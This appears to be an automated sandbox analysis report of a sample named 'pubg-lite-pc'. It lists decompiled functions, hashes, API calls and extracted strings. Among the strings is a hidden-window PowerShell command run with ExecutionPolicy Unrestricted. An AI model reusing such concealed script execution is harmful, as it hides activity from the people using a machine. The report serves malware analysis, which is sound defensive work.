                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 96c6ff0f385d77eea36047fc82cbced76772fee9f5f7c6e57031ff6fa705dddc
                                                                                                • Instruction ID: a952b2570201c0d70bffa2b3f772a1d1c74c0a54ab185af2eaed49df87d197e3
                                                                                                • Opcode Fuzzy Hash: 96c6ff0f385d77eea36047fc82cbced76772fee9f5f7c6e57031ff6fa705dddc
                                                                                                • Instruction Fuzzy Hash: C671E8B0805B48DFE761CF64C95478ABFF0BB09314F108A5EC4A99B391D3B96648DF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00979180 Relevance: .1, Instructions: 109COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 868712a6854083735775686fb5f9015785eda41bb4f9913f4a0128e02bb781c3
                                                                                                • Instruction ID: b3a1472eedeaa71491d4dfc0289ee2b689a6277a69d3e4c4453cf47a43fba2ad
                                                                                                • Opcode Fuzzy Hash: 868712a6854083735775686fb5f9015785eda41bb4f9913f4a0128e02bb781c3
                                                                                                • Instruction Fuzzy Hash: 2551F2B0801744DFE721CF65C55878BBFF4AB15318F20899DD4A95B382C3BAA60ACF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A62C0E Relevance: .1, Instructions: 104COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 380f2cf98c70ae966fa3374a39c6b426a40e0d19beb501a63d774a341deeb51a
                                                                                                • Instruction ID: f885536b71eb260c220d699644fa94d8f5ac0515236a6f6d475a082768c86e94
                                                                                                • Opcode Fuzzy Hash: 380f2cf98c70ae966fa3374a39c6b426a40e0d19beb501a63d774a341deeb51a
                                                                                                • Instruction Fuzzy Hash: 4421B673F20439477B0CC57E8C562BDB6E1C68C501745823AE8A6EA2C1D968D917E2E4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009589C5 Relevance: .1, Instructions: 85COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dfd3ec0f2b93734c96801c51720950e1b7b78db8e2dba69883ec6e63763e793b
                                                                                                • Instruction ID: b4043e9191871e264a8cf925bd05403860c8eb63675d11fde100c8d791512b86
                                                                                                • Opcode Fuzzy Hash: dfd3ec0f2b93734c96801c51720950e1b7b78db8e2dba69883ec6e63763e793b
                                                                                                • Instruction Fuzzy Hash: C84100B0506B82DED720CF29C954386FBF0BB0A324F10478DC4A94B691D7B56649DF84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009560E0 Relevance: .1, Instructions: 84COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 62d7fa67c0bcf49e28962eb5514abdb2998d8bb6e8431029eec84fb1ea75f9f6
                                                                                                • Instruction ID: f5a15548d69c5654af2b5c5c56908ae778f6e2515deb4b5e809eca446297b6dd
                                                                                                • Opcode Fuzzy Hash: 62d7fa67c0bcf49e28962eb5514abdb2998d8bb6e8431029eec84fb1ea75f9f6
                                                                                                • Instruction Fuzzy Hash: 4F4103B0901B85EED704CF69C50878AFBF0BB19318F20869DD4589B781D3BAA619CF95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A62AEE Relevance: .1, Instructions: 81COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e0c865806e49e972e133aa11e8d1e34afbaa41d8f1745f8537f11c86a758fdda
                                                                                                • Instruction ID: d5b0d4a24ded45023adba23e7b3a7382ca2050aae8ba39d1d0953d72d1a06595
                                                                                                • Opcode Fuzzy Hash: e0c865806e49e972e133aa11e8d1e34afbaa41d8f1745f8537f11c86a758fdda
                                                                                                • Instruction Fuzzy Hash: AC117333F30C255A675C85798C172BAA6D2EBD825070F533AD826EB284E9A4DE13D290
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00958FA9 Relevance: .1, Instructions: 80COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e2bb4e1b242492f52d693e20cbc95446f776a9fd73a144a3cc9bff6d1fcdaf1a
                                                                                                • Instruction ID: c34e5b68d91358a1ce8a4ded76d851e1bc2c3c95dc3fc327de9a2d8e66c0ecf0
                                                                                                • Opcode Fuzzy Hash: e2bb4e1b242492f52d693e20cbc95446f776a9fd73a144a3cc9bff6d1fcdaf1a
                                                                                                • Instruction Fuzzy Hash: 1D4190B0515744DFE710CF25C56878ABFA0AB46328F2482DDC4991F292D3BA9A4ACF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00930510 Relevance: .1, Instructions: 54COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 167be05d657c2fbb46048f4195f651acefe1cc3fe9feb49e1af91525cfdacfe1
                                                                                                • Instruction ID: c91d3d8105394d262eb9c249c4dc40417e2b7b84cb9ecc53516fa3e0ae4c1635
                                                                                                • Opcode Fuzzy Hash: 167be05d657c2fbb46048f4195f651acefe1cc3fe9feb49e1af91525cfdacfe1
                                                                                                • Instruction Fuzzy Hash: 432158B0804788DFD711CF58C944B8ABBF4FB19314F11869ED4559B791E7B9AA08CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00930AD0 Relevance: .1, Instructions: 54COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 50707545bf134da9747849030c2f96f63d0a34f478aae3ecc6ba1e6cff0b9a11
                                                                                                • Instruction ID: d2027422037f9aba666578641941a9b81115f91d49ce6d045bf9bd6e2bba19b3
                                                                                                • Opcode Fuzzy Hash: 50707545bf134da9747849030c2f96f63d0a34f478aae3ecc6ba1e6cff0b9a11
                                                                                                • Instruction Fuzzy Hash: AB2158B0804748DFD711CF58C90478ABBF4FB19314F11869ED4559B7A1E7B9AA08CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A5FA8A Relevance: .0, Instructions: 22COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fdf034bce4ecaaf2e7d9e31bf0271b8ae893f9d610ca22952ce183a7eba31ef3
                                                                                                • Instruction ID: c1e2179d670ba9a37da172046cebe5256a6499f3027f72e988fb6b14673d9e02
                                                                                                • Opcode Fuzzy Hash: fdf034bce4ecaaf2e7d9e31bf0271b8ae893f9d610ca22952ce183a7eba31ef3
                                                                                                • Instruction Fuzzy Hash: 6FE08C32915228EFCB15DBC8CA0498AF3ECFB45B41B5500A6FA05E3200CA70DE04CBD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D99EEB9 Relevance: .0, Instructions: 22COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E6D99EEB9(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					L6D99A159(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}






                                                                                                0x6d99eec6
                                                                                                0x6d99eec8
                                                                                                0x6d99eecb
                                                                                                0x6d99eece
                                                                                                0x6d99eed1
                                                                                                0x6d99eee2
                                                                                                0x6d99eee4
                                                                                                0x6d99eed3
                                                                                                0x6d99eed7
                                                                                                0x6d99eee0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d99eee0
                                                                                                0x6d99eee9

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fb669fdbad2ec4b011b37771d5042d4284739f84a4870a98ba67d57f300fb1fe
                                                                                                • Instruction ID: dd93b3d740c0f1cce5cd7a3946fba1783326b9449ddf250eb5f8e9ac45790241
                                                                                                • Opcode Fuzzy Hash: fb669fdbad2ec4b011b37771d5042d4284739f84a4870a98ba67d57f300fb1fe
                                                                                                • Instruction Fuzzy Hash: 5AE08C32916228EBCB11CBC8C900E9AB3ECFB48A00B1904AAFA01D7200C270DE00C7C0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0099D030 Relevance: 31.8, APIs: 10, Strings: 8, Instructions: 295libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,IsThemeActive), ref: 0099D0F4
                                                                                                • GetProcAddress.KERNEL32(?,IsAppThemed), ref: 0099D114
                                                                                                • GetProcAddress.KERNEL32(?,OpenThemeData), ref: 0099D134
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc
                                                                                                • String ID: BUTTON$CloseThemeData$DrawThemeBackground$DrawThemeEdge$IsAppThemed$IsThemeActive$OpenThemeData$unused
                                                                                                • API String ID: 190572456-56125486
                                                                                                • Opcode ID: e39afa9f116bcfcdc72f2e63e21dc8db3598b7e79a2b6096966ff8cc52aaf67f
                                                                                                • Instruction ID: f83913ee7b77b5f2147a89690c4455810f9d63970f8f44b2b5abf2dfff3c6ba8
                                                                                                • Opcode Fuzzy Hash: e39afa9f116bcfcdc72f2e63e21dc8db3598b7e79a2b6096966ff8cc52aaf67f
                                                                                                • Instruction Fuzzy Hash: 65B14671A01209EFDF24DFA8DC89BAEBBB9FF19710F144519E815E7290DB749901CB20
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009E3940 Relevance: 30.1, APIs: 9, Strings: 8, Instructions: 335COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • txt, xrefs: 009E3A13
                                                                                                • Unable to find file , xrefs: 009E3973
                                                                                                • powershell.exe -NonInteractive -NoLogo -ExecutionPolicy Unrestricted -WindowStyle Hidden -Command "$host.UI.RawUI.BufferSize = new, xrefs: 009E3A9F
                                                                                                • Unable to retrieve PowerShell output from file: , xrefs: 009E3C9F
                                                                                                • Unable to create process: , xrefs: 009E3B45
                                                                                                • Unable to get a temp file for script output, temp path: , xrefs: 009E3A4F
                                                                                                • Unable to retrieve exit code from process., xrefs: 009E3CC2
                                                                                                • ps1, xrefs: 009E39E6, 009E39F8, 009E3A02
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Unable to create process: $Unable to find file $Unable to get a temp file for script output, temp path: $Unable to retrieve PowerShell output from file: $Unable to retrieve exit code from process.$powershell.exe -NonInteractive -NoLogo -ExecutionPolicy Unrestricted -WindowStyle Hidden -Command "$host.UI.RawUI.BufferSize = new$ps1$txt
                                                                                                • API String ID: 0-4129021124
                                                                                                • Opcode ID: e0cd0704f934ec54441c3265964ec410a8b299d0a215daa9d2576f586555ff27
                                                                                                • Instruction ID: 52f88c85c970bab9cc9ed5475aa7c303cfa4f3f37c45ce21d9a59c1a9ecb882f
                                                                                                • Opcode Fuzzy Hash: e0cd0704f934ec54441c3265964ec410a8b299d0a215daa9d2576f586555ff27
                                                                                                • Instruction Fuzzy Hash: 90C1C030D01649EFDB11DFA9CD49BAEBBB8BF09310F208259F415AB291DB749E44CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D96ECD0 Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 198COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • #47.MSI(?,?,NOT Installed,0000000D,E85BFA76), ref: 6D96ED6D
                                                                                                • #47.MSI(?,?,Installed AND (REMOVE<>"ALL"),0000001D), ref: 6D96EDB9
                                                                                                • #47.MSI(?,?,Installed AND ((REMOVE="ALL") OR (AI_INSTALL_MODE="Remove")),0000003C), ref: 6D96EE05
                                                                                                • #47.MSI(?,?,UPGRADINGPRODUCTCODE,00000014), ref: 6D96EE51
                                                                                                • #47.MSI(?,?,OLDPRODUCTS,0000000B), ref: 6D96EE9D
                                                                                                • #47.MSI(?,?,PATCH AND PATCH<>"MEDIASRCPROPNAME",00000023), ref: 6D96EEE9
                                                                                                • #47.MSI(?,?,(NOT Installed) AND (AI_UPGRADE="No") AND OLDPRODUCTS,00000035), ref: 6D96EF35
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (NOT Installed) AND (AI_UPGRADE="No") AND OLDPRODUCTS$Installed AND ((REMOVE="ALL") OR (AI_INSTALL_MODE="Remove"))$Installed AND (REMOVE<>"ALL")$NOT Installed$OLDPRODUCTS$PATCH AND PATCH<>"MEDIASRCPROPNAME"$UPGRADINGPRODUCTCODE$install$patch$upgrade
                                                                                                • API String ID: 0-4027879730
                                                                                                • Opcode ID: 58e117230e68315b36fc1791ac4fdc04c1eb91cbf44c42acdc22dd45facf7b54
                                                                                                • Instruction ID: c01117653ee6c551fa62713bcccd397cc625f33ee48207f9f565250023363e50
                                                                                                • Opcode Fuzzy Hash: 58e117230e68315b36fc1791ac4fdc04c1eb91cbf44c42acdc22dd45facf7b54
                                                                                                • Instruction Fuzzy Hash: E0714731A05258DFEF61DFA8C894BBEBBF8AF19214F50042AE512F6681C734D944CB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0097F6A0 Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 301stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrcmpiW.KERNEL32(?,static), ref: 0097F716
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0097F72B
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0097F73F
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0097F74A
                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 0097F78C
                                                                                                • CreateWindowExW.USER32(00000000,tooltips_class32,00000000,00000000,80000000,80000000,00000000,00000000,?,00000000,00000000), ref: 0097F81F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Long$CreateCursorLoadlstrcmpi
                                                                                                • String ID: Anchor Color$Anchor Color Visited$Software\Microsoft\Internet Explorer\Settings$static$tooltips_class32
                                                                                                • API String ID: 1728993792-2451883503
                                                                                                • Opcode ID: 6b1a496b14f3d1c0346ed9993f14a9457dd0d830294c5de3aa145a4fab342809
                                                                                                • Instruction ID: a36880aa9f754e73c91de59ebf489758f5175058673b0b4b0cbab8f3b7aae240
                                                                                                • Opcode Fuzzy Hash: 6b1a496b14f3d1c0346ed9993f14a9457dd0d830294c5de3aa145a4fab342809
                                                                                                • Instruction Fuzzy Hash: 12B19272A00715AFDB24CF64CD55BAAB7B9FB05710F208669E509F32D0E770AD84CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0099D990 Relevance: 26.5, APIs: 4, Strings: 11, Instructions: 232libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                • GetModuleHandleW.KERNEL32(kernel32,F4D3B90A,?,?,00000000), ref: 0099DA93
                                                                                                • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0099DADB
                                                                                                • GetProcAddress.KERNEL32(00000000,SetDllDirectory), ref: 0099DB36
                                                                                                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0099DB91
                                                                                                  • Part of subcall function 009749D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00974A11
                                                                                                Strings
